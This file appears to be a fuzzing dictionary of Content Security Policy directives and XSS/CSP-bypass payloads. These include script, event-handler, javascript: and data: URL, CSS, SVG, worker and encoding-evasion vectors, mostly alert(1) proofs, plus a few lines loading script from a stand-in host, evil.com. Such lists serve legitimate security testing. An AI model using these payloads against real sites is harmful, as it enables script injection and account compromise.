# Content Security Policy Bypass Dictionary
# Attack vectors for bypassing CSP protections

# CSP Directives
"default-src"
"script-src"
"style-src"
"img-src"
"connect-src"
"font-src"
"object-src"
"media-src"
"frame-src"
"sandbox"
"report-uri"
"child-src"
"form-action"
"frame-ancestors"
"plugin-types"
"base-uri"
"report-to"
"worker-src"
"manifest-src"
"prefetch-src"
"navigate-to"

# CSP Sources
"'self'"
"'none'"
"'unsafe-inline'"
"'unsafe-eval'"
"'strict-dynamic'"
"'unsafe-hashes'"
"'report-sample'"
"data:"
"blob:"
"filesystem:"
"https:"
"http:"
"ftp:"
"*"

# Script Injection Vectors
"<script>alert(1)</script>"
"<script src=\"javascript:alert(1)\"></script>"
"<script src=\"data:text/javascript,alert(1)\"></script>"
"<script>eval('alert(1)')</script>"
"<script>Function('alert(1)')()</script>"
"<script>setTimeout('alert(1)', 0)</script>"
"<script>setInterval('alert(1)', 0)</script>"
"<script>({}+[]).constructor.constructor('alert(1)')()</script>"

# Event Handler Injection
"<img src=x onerror=alert(1)>"
"<body onload=alert(1)>"
"<div onclick=alert(1)>"
"<svg onload=alert(1)>"
"<iframe onload=alert(1)>"
"<object onload=alert(1)>"
"<embed onload=alert(1)>"
"<video onloadstart=alert(1)>"
"<audio oncanplay=alert(1)>"

# JavaScript URL Schemes
"javascript:alert(1)"
"javascript:eval('alert(1)')"
"javascript:Function('alert(1)')()"
"javascript:setTimeout('alert(1)',0)"
"javascript:(function(){alert(1)})()"
"javascript:with(document)write(1)"

# Data URL Schemes
"data:text/html,<script>alert(1)</script>"
"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
"data:text/javascript,alert(1)"
"data:application/javascript,alert(1)"
"data:text/css,body{background:url(javascript:alert(1))}"

# Style Injection Vectors
"<style>@import 'javascript:alert(1)';</style>"
"<style>body{background:url('javascript:alert(1)')}</style>"
"<style>body{background:expression(alert(1))}</style>"
"<style>body{-moz-binding:url('javascript:alert(1)')}</style>"
"<link rel=stylesheet href=\"javascript:alert(1)\">"
"<style>/**/</style><script>alert(1)</script>"

# SVG-based Injection
"<svg><script>alert(1)</script></svg>"
"<svg onload=alert(1)>"
"<svg><foreignObject><img src=x onerror=alert(1)></foreignObject></svg>"
"<svg><use href=\"data:image/svg+xml,<svg><script>alert(1)</script></svg>\"></use></svg>"

# Object/Embed Vectors
"<object data=\"javascript:alert(1)\"></object>"
"<embed src=\"javascript:alert(1)\">"
"<object data=\"data:text/html,<script>alert(1)</script>\"></object>"
"<embed src=\"data:text/html,<script>alert(1)</script>\">"

# Import/Module Vectors
"<script type=\"module\">import('data:text/javascript,alert(1)')</script>"
"<script>import('javascript:alert(1)')</script>"
"<script>import('./data:text/javascript,alert(1)')</script>"

# Form Action Vectors
"<form action=\"javascript:alert(1)\"><input type=submit></form>"
"<form action=\"data:text/html,<script>alert(1)</script>\"></form>"

# Base URI Manipulation
"<base href=\"javascript:\">"
"<base href=\"data:text/html,\">"
"<base href=\"//evil.com/\">"

# Frame Injection
"<iframe src=\"javascript:alert(1)\"></iframe>"
"<iframe src=\"data:text/html,<script>alert(1)</script>\"></iframe>"
"<iframe srcdoc=\"<script>alert(1)</script>\"></iframe>"

# Meta Refresh Redirection
"<meta http-equiv=refresh content=\"0;url=javascript:alert(1)\">"
"<meta http-equiv=refresh content=\"0;url=data:text/html,<script>alert(1)</script>\">"

# CSS Expression (IE)
"expression(alert(1))"
"expression(eval('alert(1)'))"
"expression(Function('alert(1)')())"

# Mozilla Binding (Firefox)
"-moz-binding:url('javascript:alert(1)')"
"-moz-binding:url('data:text/html,<script>alert(1)</script>')"

# WebKit/Blink Specific
"-webkit-filter:url('javascript:alert(1)')"
"filter:url('javascript:alert(1)')"

# Font-face Injection
"@font-face{font-family:x;src:url('javascript:alert(1)')}"
"@font-face{font-family:x;src:url('data:font/woff,javascript:alert(1)')}"

# Keyframes Animation
"@keyframes x{from{background:url('javascript:alert(1)')}}",
"animation:x 1s"

# CSP Bypass via Redirects
"//evil.com/redirect?to=javascript:alert(1)"
"//evil.com/jsonp?callback=alert"
"//evil.com/script.js"

# JSONP Callback Bypass
"callback=alert"
"jsonp=alert"
"cb=alert"
"fn=alert"

# Nonce Bypass Attempts
"'nonce-'"
"'nonce-random123'"
"'nonce-'"
"nonce=\"\""
"nonce=''"

# Hash Bypass Attempts
"'sha256-'"
"'sha384-'"
"'sha512-'"

# Strict Dynamic Bypass
"'strict-dynamic'"
"<script nonce=\"random\">document.write('<script src=\"evil.js\"></script>')</script>"

# Unsafe Hashes Bypass
"'unsafe-hashes'"
"onclick=\"alert(1)\""
"onload=\"alert(1)\""

# Report Sample Bypass
"'report-sample'"

# Whitespace and Encoding Evasion
"java\tscript:alert(1)"
"java\nscript:alert(1)"
"java\rscript:alert(1)"
"java&#9;script:alert(1)"
"java&#10;script:alert(1)"
"java&#13;script:alert(1)"
"javascript&#58;alert(1)"
"javascript&#x3a;alert(1)"
"javascript&colon;alert(1)"

# Case Variation Evasion
"JavaScript:alert(1)"
"JAVASCRIPT:alert(1)"
"JaVaScRiPt:alert(1)"

# Comment Injection
"javas/**/cript:alert(1)"
"java<!---->script:alert(1)"
"<script>/**/alert(1)</script>"
"<script><!--alert(1)--></script>"

# Protocol Confusion
"vbscript:alert(1)"
"livescript:alert(1)"
"mocha:alert(1)"

# Charset Confusion
"data:text/html;charset=utf-7,+ADw-script+AD4-alert(1)+ADw-/script+AD4-"
"data:text/html;charset=utf-16be,\x00<\x00s\x00c\x00r\x00i\x00p\x00t\x00>\x00a\x00l\x00e\x00r\x00t\x00(\x001\x00)\x00<\x00/\x00s\x00c\x00r\x00i\x00p\x00t\x00>"

# Blob URL Creation
"URL.createObjectURL(new Blob(['<script>alert(1)</script>'], {type: 'text/html'}))"
"URL.createObjectURL(new Blob(['alert(1)'], {type: 'text/javascript'}))"

# Service Worker Injection
"navigator.serviceWorker.register('data:text/javascript,alert(1)')"
"navigator.serviceWorker.register('javascript:alert(1)')"

# Web Worker Injection
"new Worker('data:text/javascript,alert(1)')"
"new Worker('javascript:alert(1)')"

# CSS @import Variants
"@import url('javascript:alert(1)')"
"@import 'javascript:alert(1)'"
"@import \"javascript:alert(1)\""

# SVG External References
"<svg><use href=\"#x\"/><symbol id=\"x\"><script>alert(1)</script></symbol></svg>"
"<svg><image href=\"javascript:alert(1)\"/></svg>"

# Form-based Injection
"<form><button formaction=\"javascript:alert(1)\">Click</button></form>"
"<isindex action=\"javascript:alert(1)\">"

# Template Elements
"<template><script>alert(1)</script></template>"

# Shadow DOM Injection
"element.attachShadow({mode:'open'}).innerHTML='<script>alert(1)</script>'"